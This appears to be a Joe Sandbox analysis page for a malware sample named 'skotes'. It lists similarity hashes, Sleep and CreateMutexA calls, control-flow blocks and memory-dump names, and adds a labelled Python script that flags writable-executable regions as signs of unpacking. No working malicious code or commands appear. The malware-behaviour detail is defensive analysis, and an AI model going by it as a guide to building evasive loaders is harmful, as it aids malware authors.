                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310851449.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310868842.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310884881.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310908123.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310925434.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310943679.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310963193.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310981224.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310998973.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311018419.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311037778.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311052250.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311068907.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311087153.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311110738.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311128832.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311148034.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311166818.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311184463.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311206565.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311221539.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: CreateMutexSleep
• String ID: T2o
• API String ID: 1464230837-2760472518
• Opcode ID: 39b0532c68d778586eefcf8bad412da76e1c7c11fbd42c2ffe3f0221e999a01c
• Instruction ID: 0366bde5049348e4328e7ed5e6fbe9330464c02b07133d7c8249da831b4bcde5
• Opcode Fuzzy Hash: 39b0532c68d778586eefcf8bad412da76e1c7c11fbd42c2ffe3f0221e999a01c
• Instruction Fuzzy Hash: 90312931A04144CBEF08ABBCDCC976DBAABABC2314F24425CE1149BBD5CB755A818761

Control-flow Graph (legend: Executed, Not Executed)
APIs
• Sleep.KERNELBASE(00000064), ref: 0069A963
• CreateMutexA.KERNELBASE(00000000,00000000,006F3254), ref: 0069A981
Strings
Memory Dump Source
• Source File: 00000002.00000002.2310380497.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: CreateMutexSleep
• String ID: T2o
• API String ID: 1464230837-2760472518
• Opcode ID: 2ae36c2484c830ec114aedf246bd3fecda75918ccc23fa0042c2d94511840f15
• Instruction ID: 6edad8b0eeeb0b0f905f4b8abfac682e62a55559cc002568533095b67b3b227c
• Opcode Fuzzy Hash: 2ae36c2484c830ec114aedf246bd3fecda75918ccc23fa0042c2d94511840f15
• Instruction Fuzzy Hash: 5F3127316001448BFF089BACCC887ACBAA7EBC5314F20461CE414DBBD5CB7559818762

Control-flow Graph (legend: Executed, Not Executed)
APIs
• Sleep.KERNELBASE(00000064), ref: 0069A963
• CreateMutexA.KERNELBASE(00000000,00000000,006F3254), ref: 0069A981
Strings
Memory Dump Source
• Source File: 00000002.00000002.2310380497.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: CreateMutexSleep
• String ID: T2o
• API String ID: 1464230837-2760472518
• Opcode ID: 87522d06c81f2c95ece0958fd1a9a90da034b371720cff7325fe8669ce662750
• Instruction ID: d6afdf63be37c47740ace464d3a551eb400c0aade0f9f0818c8a3d45999f8526
• Opcode Fuzzy Hash: 87522d06c81f2c95ece0958fd1a9a90da034b371720cff7325fe8669ce662750
• Instruction Fuzzy Hash: 81312A31B101449BFF089BFCCD85B6DBBA7EBC1314F244218E1149BBD5CB7559818796

Control-flow Graph (graph image not reproduced)
APIs
• Sleep.KERNELBASE(00000064), ref: 0069A963
• CreateMutexA.KERNELBASE(00000000,00000000,006F3254), ref: 0069A981
Strings
Memory Dump Source
• Source File: 00000002.00000002.2310380497.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311087153.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311110738.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311128832.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311148034.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311166818.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311184463.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311206565.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311221539.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311240106.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311255567.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311255567.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311306441.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311320909.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311337615.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311352481.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311374544.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311396158.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID: T2o
                                                                                                                                                                                                                                          • API String ID: 1464230837-2760472518
                                                                                                                                                                                                                                          • Opcode ID: 118891223f66c982ccf93e6b631a7a23687d13c47e72a238ad1103fbfade7a25
                                                                                                                                                                                                                                          • Instruction ID: 22444c68dd797e28e46fe7be16261b01325bae30dc40926cfe8171e817c93a76
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 118891223f66c982ccf93e6b631a7a23687d13c47e72a238ad1103fbfade7a25
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE312931B001449FFF089BECDC89B6DB7A7EBC6310F244218E1149BBD5DB755A808796

Control-flow Graph
Basic blocks of the function whose entry block (124) starts at 69a418, with the address range of each block, the callee of any call it contains, and its successor blocks ("->"); this is the graph data that the rendered image carried:
• 124: 69a418-69a438 -> 128, 129
• 128: 69a43a-69a446 -> 130, 131
• 129: 69a466-69a482 -> 132, 133
• 130: 69a448-69a456 -> 131, 134
• 131: 69a45c-69a463, call 6ad663 -> 129
• 132: 69a4b0-69a4cf -> 138, 139
• 133: 69a484-69a490 -> 136, 137
• 134: 69a93f-69a949, call 6c6c6a (twice) -> 155, 156
• 136: 69a492-69a4a0 -> 134, 137
• 137: 69a4a6-69a4ad, call 6ad663 -> 132
• 138: 69a4fd-69a916, call 6a80c0 (no successor recorded)
• 139: 69a4d1-69a4dd -> 144, 145
• 144: 69a4df-69a4ed -> 134, 145
• 145: 69a4f3-69a4fa, call 6ad663 -> 138
• 155: 69a94e -> 157, 158
• 156: 69a949, call 6c6c6a -> 155
• 157: 69a953-69a994, Sleep, CreateMutexA -> 160, 161
• 158: 69a94e, call 6c6c6a -> 157
• 160: 69a9a7-69a9a8 (no successor recorded)
• 161: 69a996-69a998 -> 160, 162
• 162: 69a99a-69a9a5 -> 160
APIs
• Sleep.KERNELBASE(00000064), ref: 0069A963 (dwMilliseconds = 0x64, i.e. a 100 ms delay)
• CreateMutexA.KERNELBASE(00000000,00000000,006F3254), ref: 0069A981 (lpMutexAttributes = NULL, bInitialOwner = FALSE, lpName = pointer 0x006F3254, which falls inside the associated dump region starting at 006F2000; the name string itself is not reproduced on this page). Block 157 of the graph above branches immediately after this call, so the return value is consulted before execution continues.
Strings
Memory Dump Source
• Source File: 00000002.00000002.2310380497.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000002.00000002.2310362606.0000000000690000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310380497.00000000006F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310440680.00000000006F9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310459821.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310480195.0000000000707000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310578878.0000000000861000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310597404.0000000000863000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310616397.000000000087C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310632940.000000000087E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310649956.000000000087F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310649956.0000000000889000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310689049.000000000088D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310708966.000000000088E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310726399.0000000000891000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310744767.0000000000892000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310761898.000000000089B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310779161.00000000008A2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310802669.00000000008B4000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310817843.00000000008B5000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310836503.00000000008B6000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310851449.00000000008B7000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310868842.00000000008C3000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310884881.00000000008CD000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310908123.00000000008E9000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310925434.00000000008F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310943679.00000000008FF000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310963193.0000000000902000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310981224.0000000000903000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310998973.0000000000905000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311018419.000000000090E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311037778.000000000090F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311052250.0000000000910000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311068907.0000000000913000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311087153.000000000091A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311110738.000000000091F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311128832.0000000000920000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311148034.0000000000922000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311166818.0000000000923000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311184463.000000000092B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311206565.0000000000942000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311221539.0000000000944000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311240106.000000000094D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311255567.000000000094E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311255567.000000000096B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311306441.0000000000999000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311320909.000000000099A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311337615.000000000099F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311352481.00000000009A1000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311374544.00000000009AE000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311396158.00000000009B0000.00000080.00000001.01000000.00000007.sdmp
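The dump names listed above encode where each dumped region sits and how its pages were protected, which is the evidence behind the report's "Detected unpacking (changes PE section rights)" verdict: a PE image normally maps its code read-execute, so image-backed regions that are both writable and executable (PAGE_EXECUTE_READWRITE = 0x40, PAGE_EXECUTE_WRITECOPY = 0x80) are where unpacked or self-modified code lives. The Python below is an added example, not Joe Sandbox's code and not part of the analysed sample; it parses .sdmp names into their fields, drops the "Download File" link labels, and lists the writable-executable image regions. The field layout it assumes (pid, dump index, dump id, base address, protection, flags, type, module index) is inferred from the values shown on this page and is an assumption; the Windows constant values come from winnt.h. The sample input is a constructed excerpt of the lines above.

```python
import re
from collections import Counter
from dataclasses import dataclass

# Windows memory-protection constants from winnt.h (values are certain).
PAGE_NOACCESS = 0x01
PAGE_READONLY = 0x02
PAGE_READWRITE = 0x04
PAGE_WRITECOPY = 0x08
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
PROTECT_NAMES = {
    PAGE_NOACCESS: "PAGE_NOACCESS", PAGE_READONLY: "PAGE_READONLY",
    PAGE_READWRITE: "PAGE_READWRITE", PAGE_WRITECOPY: "PAGE_WRITECOPY",
    PAGE_EXECUTE: "PAGE_EXECUTE", PAGE_EXECUTE_READ: "PAGE_EXECUTE_READ",
    PAGE_EXECUTE_READWRITE: "PAGE_EXECUTE_READWRITE",
    PAGE_EXECUTE_WRITECOPY: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE = {PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY}
WRITABLE = {PAGE_READWRITE, PAGE_WRITECOPY, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY}

# MEMORY_BASIC_INFORMATION.Type values (certain).
MEM_PRIVATE, MEM_MAPPED, MEM_IMAGE = 0x20000, 0x40000, 0x1000000
TYPE_NAMES = {MEM_PRIVATE: "MEM_PRIVATE", MEM_MAPPED: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}

# ASSUMED layout of a Joe Sandbox dump name, inferred from the values on this page:
#   pid . dump-index . dump-id . base-address . protection . flags . type . module-index . sdmp
SDMP_RE = re.compile(
    r"(?P<pid>[0-9A-Fa-f]{8})\.(?P<dump>[0-9A-Fa-f]{8})\.(?P<dump_id>\d{8,12})"
    r"\.(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<flags>[0-9A-Fa-f]{8})"
    r"\.(?P<mem_type>[0-9A-Fa-f]{8})\.(?P<module>[0-9A-Fa-f]{8})\.sdmp"
)


@dataclass(frozen=True, order=True)
class DumpRegion:
    base: int          # first field, so sorting orders regions by address
    pid: int
    protect: int
    flags: int
    mem_type: int
    module: int
    name: str

    @property
    def writable_and_executable(self) -> bool:
        return self.protect in WRITABLE and self.protect in EXECUTABLE


def _region(m: "re.Match[str]") -> DumpRegion:
    return DumpRegion(
        base=int(m["base"], 16), pid=int(m["pid"], 16), protect=int(m["protect"], 16),
        flags=int(m["flags"], 16), mem_type=int(m["mem_type"], 16),
        module=int(m["module"], 16), name=m.group(0),
    )


def parse_sdmp_name(name: str) -> DumpRegion:
    """Parse one .sdmp file name; raises ValueError on anything else."""
    m = SDMP_RE.fullmatch(name.strip())
    if m is None:
        raise ValueError(f"not a Joe Sandbox dump name: {name!r}")
    return _region(m)


def extract_regions(report_text: str) -> list[DumpRegion]:
    """Pull every dump name out of 'Source File:' / 'Associated:' lines, ignoring trailing
    link labels such as 'Download File'; de-duplicated (the same dump is listed once per
    function entry) and sorted by base address."""
    unique = {m.group(0): _region(m) for m in SDMP_RE.finditer(report_text)}
    return sorted(unique.values())


def wx_image_regions(report_text: str) -> list[DumpRegion]:
    """Image-backed regions whose page protection is both writable and executable."""
    return [r for r in extract_regions(report_text)
            if r.mem_type == MEM_IMAGE and r.writable_and_executable]


def protection_summary(report_text: str) -> dict[str, int]:
    """How many distinct dumps were taken at each page protection."""
    return dict(Counter(PROTECT_NAMES.get(r.protect, hex(r.protect))
                        for r in extract_regions(report_text)))


def describe(r: DumpRegion) -> str:
    return (f"pid {r.pid} base {r.base:#010x} "
            f"{PROTECT_NAMES.get(r.protect, hex(r.protect))} "
            f"{TYPE_NAMES.get(r.mem_type, hex(r.mem_type))} module {r.module}")


# Constructed excerpt of the 'Memory Dump Source' lines on this page (not the full list).
SAMPLE_REPORT = """\
• Source File: 00000002.00000002.2310380497.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000002.00000002.2310362606.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
• Associated: 00000002.00000002.2310380497.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
• Associated: 00000002.00000002.2310440680.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
• Associated: 00000002.00000002.2310459821.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
• Associated: 00000002.00000002.2310480195.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
• Associated: 00000002.00000002.2310578878.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
"""

if __name__ == "__main__":
    for region in wx_image_regions(SAMPLE_REPORT):
        print(describe(region))
    print(protection_summary(SAMPLE_REPORT))
```

Run against the full report text rather than the excerpt, the output is the set of addresses worth carving for unpacked code; the regions at 690000 and 6F9000 (PAGE_READWRITE, no execute bit) are filtered out as ordinary data, and the alternation of 0x40 and 0x80 pages inside one MEM_IMAGE mapping is the section-rights change the signature refers to.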
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: CreateMutexSleep
• String ID: T2o
• API String ID: 1464230837-2760472518
• Opcode ID: f33103b67b0f1c4f478184364a07534836da677216132a3af48a3192db9e8b33
• Instruction ID: cff3433e2f7135f2c5f90b07b3366758c0c698269bec04871afa0cf4d8656bfb
• Opcode Fuzzy Hash: f33103b67b0f1c4f478184364a07534836da677216132a3af48a3192db9e8b33
• Instruction Fuzzy Hash: 0C312931B001449BEF08ABFCDC89B6DB6E7EBC2314F20421CE0149BBD5DB7599808696

Control-flow Graph
APIs
• Sleep.KERNELBASE(00000064), ref: 0069A963
• CreateMutexA.KERNELBASE(00000000,00000000,006F3254), ref: 0069A981
Strings
Memory Dump Source
• Source File: 00000002.00000002.2310380497.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: CreateMutexSleep
• String ID: T2o
• API String ID: 1464230837-2760472518
• Opcode ID: 5442b5cc8a6086cc8181596e46836717841f56c6cc8c99a897b76bdf3c36b942
• Instruction ID: 3e98949dfee2a32c63a852bfec379f111516314fafefb32faa3a1945662864cb
• Opcode Fuzzy Hash: 5442b5cc8a6086cc8181596e46836717841f56c6cc8c99a897b76bdf3c36b942
• Instruction Fuzzy Hash: 6C312731B001449BFF08ABF8CC89B6CBBABEBC5314F244618E414DBBD5CB7599818796

Control-flow Graph
APIs
• Sleep.KERNELBASE(00000064), ref: 0069A963
• CreateMutexA.KERNELBASE(00000000,00000000,006F3254), ref: 0069A981
Strings
Memory Dump Source
• Source File: 00000002.00000002.2310380497.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310708966.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310726399.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310744767.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310761898.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310779161.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310802669.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310817843.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310836503.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310851449.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310868842.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310884881.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310908123.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310925434.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310943679.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310963193.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310981224.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310998973.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311018419.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311037778.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311052250.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311068907.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311087153.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311110738.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311128832.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311148034.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311166818.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311184463.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311206565.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311221539.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311240106.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311255567.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311255567.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311306441.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311320909.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311337615.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311352481.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311374544.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311396158.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: CreateMutexSleep
• String ID: T2o
• API String ID: 1464230837-2760472518
• Opcode ID: 9478ab91340f8ac921a18eccce36119bf4236cc46acfa019afe6e5b57190a1e2
• Instruction ID: 9973423d4629349d2ddf4216c7bf5b445f13f20284a7ea39910dd4affce6049f
• Opcode Fuzzy Hash: 9478ab91340f8ac921a18eccce36119bf4236cc46acfa019afe6e5b57190a1e2
• Instruction Fuzzy Hash: B73137316001449BEF089BFCCC89B6DBBFBEBC1314F244218E1149BBD1CB759A818696
Control-flow Graph
• control_flow_graph 238 699adc-699ae8 239 699aea-699af8 238->239 240 699afe-699d91 call 6ad663 call 6a7a00 call 695c10 call 698b30 call 6a8220 call 6a7a00 call 695c10 call 698b30 call 6a8220 238->240 239->240 241 69a917 239->241 243 69a953-69a994 Sleep CreateMutexA 241->243 244 69a917 call 6c6c6a 241->244 249 69a9a7-69a9a8 243->249 250 69a996-69a998 243->250 244->243 250->249 252 69a99a-69a9a5 250->252 252->249
APIs
• Sleep.KERNELBASE(00000064), ref: 0069A963
• CreateMutexA.KERNELBASE(00000000,00000000,006F3254), ref: 0069A981
Strings
Memory Dump Source
• Source File: 00000002.00000002.2310380497.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000002.00000002.2310362606.0000000000690000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310380497.00000000006F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310440680.00000000006F9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310459821.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310480195.0000000000707000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310578878.0000000000861000.00000040.00000001.01000000.00000007.sdmp
